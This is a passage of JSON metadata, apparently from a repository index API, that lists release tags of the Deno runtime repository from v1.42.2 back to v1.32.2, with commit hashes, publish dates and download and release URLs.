06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz